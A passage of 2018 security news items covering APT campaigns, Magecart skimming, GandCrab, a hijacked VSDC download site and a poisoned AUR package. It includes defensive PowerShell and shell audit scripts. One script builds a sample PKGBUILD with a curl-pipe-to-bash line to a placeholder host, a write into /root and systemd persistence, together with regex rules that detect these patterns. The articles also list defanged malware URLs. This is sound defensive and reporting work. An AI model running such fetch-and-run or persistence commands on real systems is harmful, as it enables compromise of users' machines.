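#    does not restrict its DLL search path (KnownDLLs excepted).
$system32 = Join-Path $env:SystemRoot 'System32'
foreach ($dll in Get-ChildItem -Path $ExtractDir -Recurse -File -Include *.dll) {
    if (Test-Path -Path (Join-Path $system32 $dll.Name)) {
        $findings += "SHADOWING   $($dll.FullName) carries the name of a system DLL ($system32\$($dll.Name))"
    }
}

if ($findings.Count -eq 0) {
    Write-Output "No findings under $ExtractDir"
} else {
    $findings | ForEach-Object { Write-Output $_ }
}
```

A clean result for an installer that still extracts into %TEMP% only means the three patterns above were not seen; extracting into a freshly created directory with an explicit administrators-only ACL removes the window altogether.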
The issues were reported to Intel in May and the company updated the installer the same month, but information on the vulnerabilities was not released until last week. Intel Processor Diagnostic Tool v184.108.40.206 resolves all of the above issues.
Hackers Using Stolen D-Link Certificates for Malware Signing
12.7.2018 securityweek Virus
A cyber-espionage group is abusing code-signing certificates stolen from Taiwan-based companies for the distribution of their backdoor, ESET reports.
The group, referred to as BlackTech, appears highly skilled and focused on the East Asia region, particularly Taiwan. The certificates, stolen from D-Link and security company Changing Information Technology Inc., have been used to sign the Plead backdoor, ESET's security researchers say.
The Plead campaign is believed to have been active since at least 2012, often focused on confidential documents and mainly targeting Taiwanese government agencies and private organizations.
ESET explains that the D-Link certificate was evidently stolen rather than issued to the attackers, because it was also used to sign legitimate D-Link software, not only the Plead malware.
After being informed of the misuse of its certificate, D-Link revoked it, along with a second certificate, on July 3. In an advisory, the company said that most of its customers should not be affected by the revocation.
“D-Link was victimized by a highly active cyber espionage group which has been using PLEAD Malware to steal confidential information from companies and organizations based in East Asia, particularly in Taiwan, Japan, and Hong Kong,” the company said.
Changing Information Technology Inc., also based in Taiwan, revoked the misused certificate on July 4, but the threat actor continued to use it for malicious purposes even after that date, ESET reveals.
The signed malware samples also contain junk code for obfuscation purposes, but all perform the same action: they either fetch from a remote server or open from the local disk encrypted shellcode designed to download the final Plead backdoor module.
The malware can steal passwords from major web browsers, such as Chrome, Firefox, and Internet Explorer, and from Microsoft Outlook.
According to Trend Micro, the Plead backdoor can also list drives, processes, open windows and files on the compromised machine, open a remote shell, upload files, execute applications via the ShellExecute API, and delete files.
“Misusing digital certificates is one of the many ways cybercriminals try to mask their malicious intentions – as the stolen certificates let malware appear like legitimate applications, the malware has a greater chance of sneaking past security measures without raising suspicion,” ESET notes.
The use of stolen code-signing certificates for malware delivery is not a novel practice, and the Stuxnet worm, discovered in 2010, shows how long threat actors have been engaging in it. The first malware to target critical infrastructure, Stuxnet used digital certificates stolen from RealTek and JMicron, well-known Taiwanese tech companies.
New Attacks on Palestine Linked to 'Gaza Cybergang'
12.7.2018 securityweek APT
The Gaza Cybergang, an advanced persistent threat (APT) group linked to the Palestinian terrorist organization Hamas, apparently continues to target organizations in the Middle East, researchers at Check Point revealed last week.
The attacks observed by the security firm started with a spear-phishing email carrying a self-extracting archive that stored a Word document and a malicious executable. The emails purported to come from the Palestinian Political and National Guidance Commission and the documents contained copies of media reports from various Palestinian news websites.
While the targeted user is busy looking at the document, a piece of malware is being installed on their system. The malware, an upgraded variant of Micropsia, a tool previously linked to the Gaza Cybergang, is capable of taking screenshots, stealing documents, rebooting the system, obtaining information about the compromised device, and killing itself.
These and other capabilities are provided by more than a dozen modules, each named after characters in the American TV show “The Big Bang Theory” and a popular Turkish TV series called “Resurrection: Ertugrul.” In a related malware sample, the modules are named after various BMW car models (e.g. BMW_x1, BMW_x8).
The main target of this campaign, which Check Point has dubbed “Big Bang,” appears to be the Palestinian Authority, the governing body of the emerging Palestinian autonomous regions of the West Bank and Gaza Strip.
Researchers believe the latest attacks started in March and evidence suggests that they could be the work of the Gaza Cybergang, which has been known to target the Palestinian Authority many times in the past years.
“Although the group behind it seems to be focused on carefully selecting their victims, using a custom-made info-stealer for intelligence gathering operations, due to its very nature it is difficult to assert what the ultimate goal of this campaign is. Indeed, the next stages of the attack may even still be in the works, not yet deployed or only deployed to selected few victims,” Check Point researchers wrote in a blog post.
Also known as Gaza Hackers Team and Molerats, the threat actor has been active since at least 2012. Its targets include Israel, Egypt, Saudi Arabia, the UAE, Iraq, the United States, and some European countries.
The group has occasionally suspended activity after security firms exposed its operations, but it has continued improving tools and techniques and expanding its list of targets.
One of the most recent reports on Gaza Cybergang was published in October 2017 by Kaspersky Lab. The security firm reported at the time that the group had been targeting organizations in the Middle East and North Africa (MENA) region, including an oil and gas company from which the hackers stole information for more than a year.
Cisco Talos also published a report on Gaza Cybergang last year, detailing attacks aimed at Palestinian law enforcement.
Fitness App Revealed Data on Military, Intelligence Personnel
12.7.2018 securityweek BigBrothers
Mobile fitness app Polar has suspended its location tracking feature after security researchers found it had revealed sensitive data on military and intelligence personnel from 69 countries.
The revelation about Polar Flow, an app from Finland-based Polar, comes months after another health app, Strava, was found to have shown potentially sensitive information about US and allied forces around the world.
Security researchers in the Netherlands said Sunday they were able to find data on some 6,000 individuals including military personnel from dozens of countries and employees of the FBI and National Security Agency.
The disclosure illustrates the potential security risks of using fitness apps which can track a person's location, and which may be "scraped" for espionage.
"With only a few clicks, a high-ranking officer of an airbase known to host nuclear weapons can be found jogging across the compound in the morning," security researcher Foeke Postma said in a blog post Sunday after an investigation with the Dutch news organization De Correspondent.
"We can find Western military personnel in Afghanistan through the Polar site. Cross-checking one name and profile picture with social media confirmed one soldier or officer's identity."
The investigation found detailed personal information, including home addresses, of military personnel, persons serving on submarines, Americans in the Green Zone in Baghdad and Russian soldiers in Crimea, the researchers said.
Polar said in a statement it was suspending the app's feature that allowed users to share data, while noting that any data made public was the result of users who opted in to location tracking.
"It is important to understand that Polar has not leaked any data, and there has been no breach of private data," the statement said.
It said the location tracking feature "is used by thousands of athletes daily all over the world to share and celebrate amazing training sessions."
According to De Correspondent, only about two percent of Polar users chose to share their data, but that nonetheless allowed anyone to discover potentially sensitive data from military or civilian personnel.
"We found the names and addresses of personnel at military bases including Guantanamo Bay in Cuba, Arbil in Iraq, Gao in Mali, and bases in Afghanistan, Saudi Arabia, Qatar, Chad, and South Korea," the report said.
In January, the Pentagon said it was reviewing its policies on military personnel's use of fitness applications after Strava's map showed a series of military bases in Iraq as well as sites in Afghanistan.
Two More Traders Convicted in Newswire Hacking Scheme
12.7.2018 securityweek Hacking
Two more individuals, a hedge fund manager and a securities trader, have been convicted by a U.S. court for their role in a $30 million scheme that involved hacking major newswire companies.
Vitaly Korchevsky, a 53-year-old former hedge fund manager from Pennsylvania, and Vladislav Khalupsky, a 47-year-old securities trader residing in New York and Ukraine, have been convicted in a Brooklyn federal court on charges of conspiracy to commit wire fraud, conspiracy to commit securities fraud and computer intrusion, conspiracy to commit money laundering, and securities fraud. They each face up to 20 years in prison for their crimes.
The scheme involved Ukraine-based hackers breaking into the systems of Marketwired, PR Newswire and Business Wire between February 2010 and August 2015, and stealing as many as 150,000 press releases. The hackers sent the stolen press releases containing nonpublic financial information to several traders who quickly monetized it.
Korchevsky and Khalupsky are said to have traded based on nonpublic press releases issued by hundreds of companies, including Align Technology, CA Technologies, Caterpillar, HP, Home Depot, Panera Bread, and Verisign.
According to authorities, Korchevsky made more than $15 million over the course of the scheme, while Khalupsky, who traded for the criminal network and received a percentage of the profits, made at least $500,000.
“The evidence at trial also demonstrated that the defendants went to great lengths to conceal their roles in the criminal scheme,” the Justice Department said. “The conspirators used separate phones, computers and hotspots to conduct their illegal trading activity, and routinely deleted emails and/or destroyed hardware that contained evidence of their crimes. The conspirators also directed that payments received for the illegal profits they generated for the criminal network be made to offshore shell companies.”
Korchevsky and Khalupsky were among nine individuals accused of making $30 million through the newswire hacking scheme. Three of the suspects are still at large, but all the others, including a Ukrainian national responsible for hacking into the newswire firms, have been convicted or pleaded guilty.
The scheme involved many people, not just the nine individuals charged by the Justice Department. A separate civil case filed by the U.S. Securities and Exchange Commission (SEC) names 34 people who allegedly made $100 million in unlawful profits through this operation.
Email Security Firm Mimecast Buys Staff Training Startup Ataata
12.7.2018 securityweek IT
London, UK-based email archiving and security firm Mimecast has acquired Bethesda, Md-based security training company Ataata. Financial terms of the acquisition have not been disclosed.
Mimecast, founded by CEO Peter Bauer and CTO Neil Murray in 2003, offers a SaaS-based email platform providing email security and management. Ataata was founded in 2016 by CEO Michael Madon. It offers a continuous training platform that analyzes results and predicts which staff may be security risks.
Research by Mimecast and Vanson Bourne in May 2018 highlighted the extent to which humans are the targeted weakness in cybersecurity. From a pool of 800 IT decision makers and C-level executives, 94% had witnessed untargeted phishing attacks, 92% had witnessed spear-phishing attacks, 87% had witnessed financially-based email impersonation attacks (BEC), and 40% had seen an increase in trusted third-party impersonation attacks.
Despite this, only 11% of the respondents claimed to use continuous staff training to help employees detect and respond to such email attacks. "Cybersecurity awareness training has traditionally been viewed as a check the box action for compliance purposes, boring videos with PhDs rambling about security or even less than effective gamification which just doesn't work," commented Bauer.
"As cyberattacks continue to find new ways to bypass traditional threat detection methods, it's essential to educate your employees in a way that changes behavior," he continued. "According to a report from Gartner, the security awareness computer-based training market will grow to more than $1.1 billion by year-end 2020. The powerful combination of Mimecast's cyber resilience for email capabilities paired with Ataata's employee training and risk scoring will help customers enhance their cyber resilience efforts."
Ataata brings humor to staff training. "Every module is drafted by professional television comedy writers who understand the reality of security in the enterprise," it explains. "Yes, such people exist. We hired 'em. So our content is funny, deeply knowing about the contemporary workplace and driven by characters your employees will recognize all too well." Ataata was founded on the principle that training should not be a compliance tool imposed by management, but a commitment enjoyed by staff.
Human error is involved in the majority of all security breaches, and casual mistakes can cost organizations money and their reputation -- and employees, potentially, their jobs. "Organizations need to understand that employees are their last line of defense," says Madon. "Cybersecurity training and awareness doesn't need to be difficult or boring. Training and awareness is needed to help mitigate these internal risks. Our customers rely on engaging content at the human level, which helps to change behavior at the employee-level. We're excited to join forces with Mimecast to help customers build a stronger cyber resilience strategy that includes robust content, risk scoring and real-world attack simulation -- going way beyond basic security awareness capabilities."
Mimecast told SecurityWeek that teams from both firms will be working to integrate the products "to create the most advanced, sophisticated and effective cyber awareness training product on the market." Over time, the two platforms will become more tightly integrated, but, says Mimecast, "the offering is immediately relevant and valuable to all of Mimecast's target audiences."
Ataata has not operated from a central office. Existing staff will be maintained as employees of Mimecast, and remain based where they currently live -- with the exception of Madon. Madon, Mimecast told SecurityWeek, will relocate to Boston, where he "will now be leading up the newly established Mimecast Learning Labs, a training and certification program for Mimecast customers looking to achieve role-based excellence around security best practices."
Mimecast went public in late 2015 at $10 per share, raising $78 million in gross proceeds. After the IPO, share value fell as low as $6.20 in January 2016. Since July 2016, however, share price has risen steadily to $42.99 at the time of writing. Ataata raised $3 million in a Series A funding round in December 2017.
Apple Rolls Out USB Restricted Mode in iOS
12.7.2018 securityweek Apple
Apple on Monday released patches for various security vulnerabilities in iOS, macOS, tvOS, watchOS, and Safari, as well as for iCloud and iTunes for Windows.
In addition to fixes for 22 issues, the iOS 11.4.1 software update also introduces the long expected USB Restricted Mode, a feature that should boost the security of its platform and improve privacy.
“Starting with iOS 11.4.1, if you use USB accessories with your iPhone, iPad, or iPod touch, or if you connect your device to a Mac or PC, you might need to unlock your device for it to recognize and use the accessory. Your accessory then remains connected, even if your device is subsequently locked,” Apple says.
The new feature should prevent USB devices connected over the Lightning port from being used to crack the device's passcode and access user data, if the connection attempt occurs more than one hour after the device was locked.
The new feature can be found in Settings > Face ID (or Touch ID) & Passcode > USB Accessories. Users should leave the toggle disabled to take advantage of USB Restricted Mode.
With the roll-out of this new capability on iOS, it becomes more difficult for forensic analysts to access data on a suspect's devices, as they only have a one-hour window in which to attempt to crack the available protections.
Once it has kicked in, USB Restricted Mode persists through reboots and even if the device software has been restored via Recovery mode, ElcomSoft’s Oleg Afonin explains.
However, it is possible to reset the USB Restricted Mode countdown timer if an untrusted USB accessory is connected to the device within the first hour.
The 22 vulnerabilities addressed with the release of iOS 11.4.1 impact CFNetwork, Emoji, Kernel, libxpc, LinkPresentation, WebKit, WebKit Page Loading, and Wi-Fi. WebKit was impacted the most, with 14 vulnerabilities addressed in it.
The addressed issues include unexpected persistence of cookies in Safari, denial of service, elevation of privileges, access to restricted memory, address bar spoofing, arbitrary code execution, unexpected Safari crashes, exfiltration of audio data cross-origin, and sandbox escape.
The new iOS release is available for iPhone 5s and later, iPad Air and later, and iPod touch 6th generation.
Apple also patched 11 security flaws with the release of macOS High Sierra 10.13.6, Security Update 2018-004 Sierra, and Security Update 2018-004 El Capitan. The bugs impact AMD, APFS, ATS, CFNetwork, CoreCrypto, DesktopServices, IOGraphics, Kernel, libxpc, and LinkPresentation.
The most important of the issues is CVE-2018-3665, a vulnerability that impacts Intel processors. Dubbed LazyFP and detailed last month, the bug is similar to Meltdown Variant 3a and could be exploited to access floating point unit (FPU) state data, which can contain sensitive information, such as cryptographic keys.
“Systems using Intel Core-based microprocessors may potentially allow a local process to infer data utilizing Lazy FP state restore from another process through a speculative execution side channel,” Apple notes.
The newly released watchOS 4.3.2 resolves a total of 14 vulnerabilities, while tvOS 11.4.1 addresses 18. Apple resolved 16 flaws with the release of Safari 11.1.2, and patched 14 bugs in both iCloud for Windows 7.6 and iTunes 12.8 for Windows.
GandCrab Ransomware Spreads Via NSA Exploit
12.7.2018 securityweek Ransomware
GandCrab, a ransomware family that has received numerous updates in recent months, is now attempting to infect Windows XP machines using the NSA-linked EternalBlue exploit.
The malware usually spreads via spam emails, but GandCrab 4, which first emerged earlier this month, is being distributed via compromised websites, Fortinet says. The new version appends the .KRAB extension to encrypted files.
The new variant also includes an overhaul in terms of code structure, has switched to the Salsa20 stream cipher for data encryption, and also removed some of the older features. More importantly, it no longer requires command and control (C&C) communication to encrypt files.
“For this latest release, we have found numerous infected websites injected with malicious pages. These pages instantly redirect users to a separate page containing the actual download link leading to the GandCrab executable,” Fortinet explains.
Both the malware executable and the download links are being updated regularly, the security researchers say. In fact, within days after version 4 emerged, the ransomware authors released GandCrab 4.1, which has already shown signs of network communication.
More importantly, as security researcher Kevin Beaumont has discovered, the ransomware is also attempting to spread through the National Security Agency’s EternalBlue SMB exploit.
The most interesting aspect of this new capability is the fact that Windows XP and Windows Server 2003 systems too are targeted, along with modern operating systems.
The EternalBlue exploit targets a security bug in Windows' Server Message Block (SMB) implementation on port 445. The flaws, however, only impact older operating system versions, mainly Windows XP and Windows 7.
The exploit did not previously work on Windows XP out of the box, but that did not prevent ransomware such as WannaCry from attempting to spread using it. In fact, numerous malware families have abused the exploit to date, including the NotPetya wiper.
Microsoft patched the vulnerability that EternalBlue targets before the exploit became public, and even pushed an emergency patch for Windows XP to keep users safe from WannaCry.
Thus, as Beaumont points out, the best defense against GandCrab and any malware spreading via EternalBlue is to apply the available patch for all operating systems, including the older Windows XP and Windows Server 2003.
“Many antivirus products have dropped support for Windows XP and 2003, which makes this problematic. You probably want to make sure staff know not to download things from BitTorrent, install unknown software, run keygens, access random USB sticks etc.,” Beaumont notes.
Ticketmaster Breach: Tip of the Iceberg in Major Ongoing Magecart Attacks
12.7.2018 securityweek Attack
In June 2018, Ticketmaster UK warned that some of its customers -- which it put at less than 5% of its global customer base -- may have had their payment information accessed by an unknown third-party. Ticketmaster laid the blame on third-party provider Inbenta, who laid the blame on Ticketmaster, who in turn had been warned by online bank Monzo in April that they might have been breached. Clearly, there was more to this story than was being told at the time.
RiskIQ researchers Yonathan Klijnsma and Jordan Herman have now filled in some of the gaps. An analysis of the events suggests that the breach was bigger and over a longer period than previously thought -- but it is only one part of a much larger and ongoing campaign to steal users' payment details. The researchers go further -- naming the unknown third-party culprit as the Magecart actors.
RiskIQ has been monitoring Magecart since 2015, and produced a report in 2016. Magecart uses a form of virtual card skimming, scraping payment details during online transactions and sending the card details to the criminals. Originally, the Magecart actors hacked retail stores directly. Now it seems to have evolved to breaching the suppliers of widely used third-party components.
This is what seems to have happened with Ticketmaster UK and Inbenta. Inbenta code was compromised with the addition of Magecart skimming software. "Inbenta explained that the module was custom built for Ticketmaster," write the researchers. "To modify the source of this module, the attackers would have needed access to Inbenta's systems in some way or form. We believe that Inbenta was breached, but there is another possibility: a Ticketmaster developer account was breached to access Inbenta. Unless the companies provide more transparency into the event, we will never know."
Ticketmaster UK has said that the Inbenta breach led to subsequent 'breaches' at their Ticketmaster International, Ticketmaster UK, GETMEIN!, and TicketWeb websites. RiskIQ's researchers say this list should include at least Ticketmaster New Zealand and Ticketmaster Ireland as well, and add that Ticketmaster Germany, Ticketmaster Australia, and Ticketmaster International were compromised by Magecart via a different third-party supplier of functionality, in this case SociaPlus.
The Magecart campaign spreads far beyond just Ticketmaster and Inbenta and SociaPlus. "While Ticketmaster received the publicity and attention, the Magecart problem extends well beyond Ticketmaster," said Klijnsma. "We believe it's cause for far greater concern -- Magecart is bigger than any other credit card breach to date and isn't stopping any day soon."
The report highlights three other major component suppliers that it claims are currently breached by Magecart. The first, PushAssist, provides web analytics similar to Google Analytics. "Their server has been breached and is still serving analytics with the Magecart skimmer. The service boasts having over 10 thousand websites using its analytics platform... This means any website performing payment processing on their website that uses PushAssist is, right now, within reach of the Magecart skimmer."
The second is Clarity Connect, which provides a CMS for company owners to create an online presence with a website or web store. The Magecart actors have even left a message in the compromised code: 'If you will delete my code one more time I will encrypt all your sites: you very bad admins.' It seems, suggest the researchers, "the Magecart actors have broad access that they aren't afraid to use if the administrator removes their skimmer again. Clarity Connect's customers are affected by this injected skimmer code."
The third example is Annex Cloud, another analytics provider currently compromised by Magecart -- and again it appears as if the actors have broad access to the Annex Cloud servers.
"It appears that Magecart was able to access hundreds of other high-profile ecommerce sites during its credit card skimming campaign, which means the scale of this breach looks set to be unprecedented," comments Ross Brewer, VP & MD EMEA at LogRhythm. He notes that like many other hackers, the Magecart actors have switched their attention to the supply chain. They are, he says, "redirecting their attention to smaller, third party suppliers that can act as a gateway to more lucrative targets. As the saying goes, you're only as strong as your weakest link, which means if one of your third-party partners doesn't have the same commitment to data protection, any tools you have in place are essentially rendered useless."
Magecart, warn the RiskIQ researchers, "is an active threat that operates at a scale and breadth that rivals -- or possibly surpasses -- the recent compromises of point-of-sale systems of retail giants such as Home Depot and Target. The Magecart actors have been active since 2015 and have never retreated from their chosen criminal activity. Instead, they have continually refined their tactics and targets to maximize the return on their efforts."
San Francisco, Calif-based RiskIQ raised $30.5 million in a Series C funding round led by Georgian Partners in November 2016. This brought the total funding raised by the firm to $65.5 million.
Popular software VSDC official website was hacked and used to distribute malware
12.7.2018 securityaffairs Virus
Hackers have compromised the website of VSDC (http://www.videosoftdev.com), a popular company that provides free audio and video conversion and editing software.
Experts from Chinese security firm Qihoo 360 Total Security discovered that attackers hijacked the download links of the popular audio and video editor, VSDC.
The experts discovered that hackers hijacked the download links on the website during three different periods, pointing them at servers under their control.
The attackers gained access to the administrative part of the site's server and replaced the links to the program's distribution file.
The experts found that the attacks originated from an IP address in Lithuania, 185[.]25.51.133.
“360 Security Center discovered the download links of a famous audio and video editor, VSDC (http://www.videosoftdev.com), have been hijacked on the official website. The computer will be infected with a theft Trojan, a keylogger and a remote control Trojan after the program is downloaded and installed,” reads the analysis published by Qihoo 360 Total Security.
Below are the details of the three attacks:
June 18 – Hackers substituted download links with hxxp://220.127.116.11/_files/file.php
July 2 – Hackers substituted download links with hxxp://drbillbailey.us/tw/file.php
July 6 – Hackers substituted download links with hxxp://drbillbailey.us/tw/file.php
VSDC confirmed the incident and fixed the links on its website.
The first and third periods affected the most users, who were infected with three different pieces of malware.
The infostealer hijacks sensitive information including Telegram account / password, Steam account / password, Skype chat log, Electrum wallet and screenshot from victims’ machine. Data are sent back to hxxp://system-check.xyz/index.php.
The keylogger records all keyboard actions and sends the record to hxxp://wqaz.site/log/index.php.
The third file is a Hidden VNC remote control Trojan that could be used by attackers to control the infected PC.
The security researcher Ivan Korolev from Dr.Web revealed that the third file is a version of DarkVNC, a lesser known RAT.
Popular Software Site Hacked to Redirect Users to Keylogger, Infostealer, More - by @campuscodi https://www.bleepingcomputer.com/news/security/popular-software-site-hacked-to-redirect-users-to-keylogger-infostealer-more/ …
The third trojan that is screenshoted by Qihoo is DarkVNC, not a TVRAT or SpyAgent. However, they might have replaced the file before it was analyzed by @malwrhunterteam
“This domain name hijacking is a global attack and has affected more than thirty countries. It is more likely to be a Supply Chain Attack instead of a local network hijacking.” continues the analysis.
“On behalf of VSDC team we’d like to inform our users that the attacks have been stopped and all the vulnerabilities detected and removed”
1. All the source files of the site have been restored, the fake ones have been deleted.
All the passwords have been changed. As our practice has shown, 10-12 character passwords made of random characters are not complex enough, so they have their length significantly increased.
2. Two-level authentication of access to the administrative part at the IIS server level was introduced.
3. On the server currently there is a utility that checks all files for validity.
A tainted version of Arch Linux PDF reader package found in a user-provided AUR
12.7.2018 securityaffairs Hacking
Hackers have poisoned the Arch Linux PDF reader package named “acroread” that was found in a user-provided Arch User Repository (AUR).
Hackers have poisoned the Arch Linux PDF reader package, which means that users who recently downloaded a PDF viewer named “acroread” may have been compromised.
The PDF reader package was tainted with malware, and Arch Linux has removed the user-provided package from the Arch User Repository (AUR).
This incident raises the discussion about the installation of software from untrusted sources and the possibility that threat actors poison the supply chain.
The specific user repository had been abandoned by its maintainer, leaving the door open for a threat actor.
Someone using the handle “xeactor” modified the package by adding a downloader script that loads malicious code hosted on a server maintained by the attackers.
The maintainer Eli Schwartz quickly reverted the commits after discovering the hack and also suspended the account of xeactor.
“The acroread AUR package appears to have been compromised: look at https://aur.archlinux.org/cgit/aur.git/commit/?h=acroread&id=b3fec9f2f16703c2dae9e793f75ad6e0d98509bc (and in particular that curl|bash line!). Not exactly sure who to contact, but I assume someone on this list can get things sorted out.” wrote Schwartz.
“Account suspended, commit reverted using Trusted User privileges.”
Schwartz also discovered two other packages that were tainted with a similar technique, both have been removed.
The user Bennett Piater wrote on the Arch Linux mailing list that he noticed a suspect script that creates ‘compromised.txt’ in the root and all home folders.
“Looks to me like this is more of a warning than anything else, no? Why would he create those files otherwise, given how much attention that would attract?” Piater said.
for x in /root /home/*; do
  if [[ -w "$x/compromised.txt" ]]; then
    echo "$FULL_LOG" > "$x/compromised.txt"
  fi
done
The acroread package was used by the attackers as a dropper, and the script configured systemd to rerun it on a regular basis, a circumstance confirmed by Schwartz too.
“Side note on the acroread pastes: https://ptpb.pw/~x was executed by the PKGBUILD, which in turn executed https://ptpb.pw/~u. But the thing it installed declares an ssupload() function then tries to execute the contents of $uploader to actually upload the data collection.” wrote Schwartz.
The good news is that the malicious software did not work.
Arch maintainer Giancarlo Razzolini played down the problem, explaining that using the AUR can clearly expose users to risk, but that it is their choice.
“This would be a warning for what exactly? That orphaned packages can be adopted by anyone? That we have a big bold disclaimer on the front page of the AUR clearly stating that you should use any content at your own risk? This thread is attracting way more attention than warranted. I’m surprised that this type of silly package takeover and malware introduction doesn’t happen more often.” wrote Razzolini.
“This is why we insist users always download the PKGBUILD from the AUR, inspect it and build it themselves. Helpers that do everything automatically and users that don’t pay attention, *will* have issues. You should use helpers even more so at your risk than the AUR itself.”
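As an added example (not code from the Arch project, the AUR or anyone in the thread), a small shell audit that flags the warning signs described above in a PKGBUILD before it is built: a download piped straight into a shell like the curl|bash line Schwartz pointed at, writes into /root or the home directories, and systemd persistence. The two sample PKGBUILDs and their URLs are constructed for the demonstration; the patterns are heuristics a reviewer would want to eyeball, not a malware signature.

```shell
# Constructed PKGBUILD samples (not the real acroread commit): one clean, one
# carrying the same warning signs the thread describes.
make_sample_pkgbuilds() {
  SAMPLE_DIR=$(mktemp -d)
  cat > "$SAMPLE_DIR/PKGBUILD.clean" <<'EOF'
pkgname=examplepdf
pkgver=1.0
source=("https://example.invalid/examplepdf-1.0.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
package() {
  install -Dm755 "$srcdir/examplepdf" "$pkgdir/usr/bin/examplepdf"
}
EOF
  cat > "$SAMPLE_DIR/PKGBUILD.tainted" <<'EOF'
pkgname=examplepdf
pkgver=1.0
source=("https://example.invalid/examplepdf-1.0.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')
package() {
  curl -s https://paste.invalid/~x | bash
  install -Dm755 "$srcdir/examplepdf" "$pkgdir/usr/bin/examplepdf"
  echo "$FULL_LOG" > /root/compromised.txt
  systemctl enable examplepdf.timer
}
EOF
}

# check LABEL REGEX FILE: print the matching lines under LABEL; return 1 on any match.
check() {
  matches=$(grep -nE "$2" "$3") || return 0
  printf '  [%s]\n%s\n' "$1" "$matches"
  return 1
}

# audit_pkgbuild FILE: returns 0 when no rule fired, 1 otherwise, and leaves the
# number of rules that fired in AUDIT_HITS. Rules are deliberately broad; a hit
# means "read this line before you run makepkg", not "this is malware".
audit_pkgbuild() {
  AUDIT_HITS=0
  printf 'auditing %s\n' "$1"
  check 'download piped into a shell' \
    '(curl|wget)[^|]*\|[[:space:]]*(ba|z|da)?sh([[:space:]]|$)' "$1" || AUDIT_HITS=$((AUDIT_HITS+1))
  check 'network fetch inside a build function (not in source=())' \
    '^[[:space:]]+(curl|wget)[[:space:]]' "$1" || AUDIT_HITS=$((AUDIT_HITS+1))
  check 'write into /root, /home or $HOME' \
    '(>|tee)[[:space:]]*"?(/root|/home/|\$HOME)' "$1" || AUDIT_HITS=$((AUDIT_HITS+1))
  check 'systemd persistence' \
    'systemctl[[:space:]]+(enable|start)|/(etc|usr/lib)/systemd/system' "$1" || AUDIT_HITS=$((AUDIT_HITS+1))
  check 'decode-and-run' \
    'base64[[:space:]]+(-d|--decode)|(^|[[:space:];])eval[[:space:]]' "$1" || AUDIT_HITS=$((AUDIT_HITS+1))
  [ "$AUDIT_HITS" -eq 0 ]
}

# Demo: the clean sample passes, the tainted one trips four rules.
make_sample_pkgbuilds
for f in "$SAMPLE_DIR/PKGBUILD.clean" "$SAMPLE_DIR/PKGBUILD.tainted"; do
  if audit_pkgbuild "$f"; then
    echo "  no findings: still read the whole file before makepkg"
  else
    echo "  $AUDIT_HITS rule(s) triggered: do not build this"
  fi
done
```

Run it against the PKGBUILD fetched from the AUR before makepkg; a result with no findings is a reason to read the file, not to skip reading it.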
Hacker offered for sale US Military Reaper Drone documents for $200
12.7.2018 securityaffairs CyberCrime
Researchers at threat intelligence firm Recorded Future have reported that a hacker was trying to sell US Military Reaper drone documents for less than $200.
The news is disconcerting: the hacker may have obtained the Reaper drone documents by breaking into at least two computers belonging to U.S. military personnel.
“Specifically, an English-speaking hacker claimed to have access to export-controlled documents pertaining to the MQ-9 Reaper unmanned aerial vehicle (UAV). Insikt analysts engaged the hacker and confirmed the validity of the compromised documents.” reads the analysis published by Recorded Future.
“Insikt Group identified the name and country of residence of an actor associated with a group we believe to be responsible.”
Experts from Recorded Future contacted the hacker, who explained that he had obtained the documents by exploiting a vulnerability in Netgear routers that has been known since 2016.
The hacker used the Shodan search engine to find vulnerable devices online and targeted them with the available exploit; evidently one of them gave the attacker access to the sensitive documents.
The compromised Netgear router was located at a Reaper station at Creech Air Force Base in Nevada, and it was simple for the hacker to compromise it.
The hacker stole Reaper maintenance course books and a list of airmen assigned to controlling the drone.
“Utilizing the above-mentioned method, the hacker first infiltrated the computer of a captain at 432d Aircraft Maintenance Squadron Reaper AMU OIC, stationed at the Creech AFB in Nevada, and stole a cache of sensitive documents, including Reaper maintenance course books and the list of airmen assigned to Reaper AMU.” states Recorded Future.
“While such course books are not classified materials on their own, in unfriendly hands, they could provide an adversary the ability to assess technical capabilities and weaknesses in one of the most technologically advanced aircrafts.”
The hacker also offered for sale a dozen training manuals describing improvised explosive device defeat tactics, how to operate an M1 Abrams tank, a file on tank platoon tactics, and a crewman training and survival manual.
Though Recorded Future couldn’t elicit the source of those docs from the hacker, the company said it appeared the files had been taken from a U.S. Army staffer.
The documents weren’t classified, but Recorded Future pointed out that their content was highly sensitive and could be abused by various threat actors, including terrorist organizations.
Recorded Future reported its discovery to the DHS in mid-June, which started an internal investigation.
“We will not comment on documents that were allegedly stolen, and cannot verify,” said a Department of Defense spokesperson.
If the source of the documents is confirmed, this incident raises the discussion about the lack of security on military personnel computers.
“Maybe government agencies should start looking into their own policies,” concludes Recorded Future researcher Andrei Barysevich. “Right now it seems to be a bigger problem than we had anticipated.”
Intel pays a $100K bug bounty for the new CPU Spectre 1.1 flaw
12.7.2018 securityaffairs Security
A team of researchers has discovered a new variant of the well-known Spectre attack (Spectre 1.1), and Intel has paid a $100,000 reward under its bug bounty program.
Intel has paid out a $100,000 bug bounty for new vulnerabilities that are related to the first variant of the Spectre attack (CVE-2017-5753), which is why they are tracked as Spectre 1.1 (CVE-2018-3693) and Spectre 1.2.
Intel credited Kiriansky and Waldspurger with reporting the vulnerabilities and paid out $100,000 to Kiriansky via its bug bounty program on HackerOne.
In early 2018, researchers from Google Project Zero disclosed details of both Spectre Variants 1 and 2 (CVE-2017-5753 and CVE-2017-5715) and Meltdown (CVE-2017-5754).
Both attacks leverage the “speculative execution” technique used by most modern CPUs to optimize performance.
The team of experts composed of Vladimir Kiriansky of MIT and Carl Waldspurger of Carl Waldspurger Consulting discovered two new variants of Spectre Variant 1.
Spectre 1.1 is a bounds-check bypass store flaw that could be exploited by attackers to trigger speculative buffer overflows and execute arbitrary code on the vulnerable processor.
This code could potentially be exploited to exfiltrate sensitive data from the CPU memory, including passwords and cryptographic keys.
“We introduce Spectre1.1, a new Spectre-v1 variant that leverages speculative stores to create speculative buffer overflows. Much like classic buffer overflows, speculative out-of-bounds stores can modify data and code pointers. Data-value attacks can bypass some Spectre-v1 mitigations, either directly or by redirecting control flow.” reads the research paper.
“Control-flow attacks enable arbitrary speculative code execution, which can bypass fence instructions and all other software mitigations for previous speculative-execution attacks.”
The second sub-variant discovered by the experts, called Spectre1.2, is a read-only protection bypass.
It depends on lazy PTE enforcement that is the same mechanism exploited for the original Meltdown attack.
